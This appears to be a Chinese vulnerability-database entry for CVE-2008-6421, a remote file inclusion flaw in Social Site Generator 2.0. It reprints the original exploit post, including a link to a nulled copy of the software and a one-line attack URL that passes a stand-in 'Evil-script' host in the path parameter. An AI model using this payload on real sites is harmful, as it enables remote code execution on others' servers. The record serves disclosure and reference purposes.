Social Site Generator 'social_game_play.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115313 漏洞类型 代码注入
发布时间 2008-05-31 更新时间 2009-03-13
CVE编号 CVE-2008-6421 CNNVD-ID CNNVD-200903-131
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/5707
https://www.securityfocus.com/bid/29462
https://cxsecurity.com/issue/WLB-2009030149
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-131
|漏洞详情
SocialSiteGenerator(SSG)是一款社交网络系统(SNS)平台构建工具。SocialSiteGenerator(SSG)2.0版本的social_game_play.php中存在PHP远程文件包含漏洞。远程攻击者可以借助路径参数中的一个URL,执行任意PHP代码。
|漏洞EXP
< ------------------- vBmad ------------------- >

############################################################################################
#
# Application Name    : Social Site Generator
#
# Download               : http://rapidshare.com/files/118424866/Social.Site.Generator.v2._iAG_.Nulled.rar
#
# Vulnerable Type      : RFI (remote file include)
#
# Dork                       : search it :p
# 
# Vulnerable file         : social_game_play.php
#
# author                    : vBmad
#
# Team                     : nab3 Team & hamama team
#
# Greatz                    : ALLAH
#                                   rouchtekh & jonelo & okx all hackerz moroccan    &    bigg thnx to my teacher Roi-PhP
#                               www.nab3i.com     &    www.nab3.2007.fr   &    www.maroc-mp3.net
#
#
############################################################################################

< ------------------- vBmad ------------------- >|
\        /                                                          |
  \    /          uhh@hotmail.fr                            |
    \/__________________________________|


< -- Bug -- >

Exploit :

http://target/path/social_game_play.php?path=http://Evil-script?

< -- Bug -- >

#The majority of the versions are infected

# milw0rm.com [2008-05-31]
|受影响的产品
Social Site Generator Social Site Generator 0
|参考资料

来源:XF
名称:socialsitegenerator-path-file-include(42780)
链接:http://xforce.iss.net/xforce/xfdb/42780
来源:BID
名称:29462
链接:http://www.securityfocus.com/bid/29462
来源:MILW0RM
名称:5707
链接:http://www.milw0rm.com/exploits/5707
来源:SECUNIA
名称:30462
链接:http://secunia.com/advisories/30462
来源:OSVDB
名称:45865
链接:http://osvdb.org/45865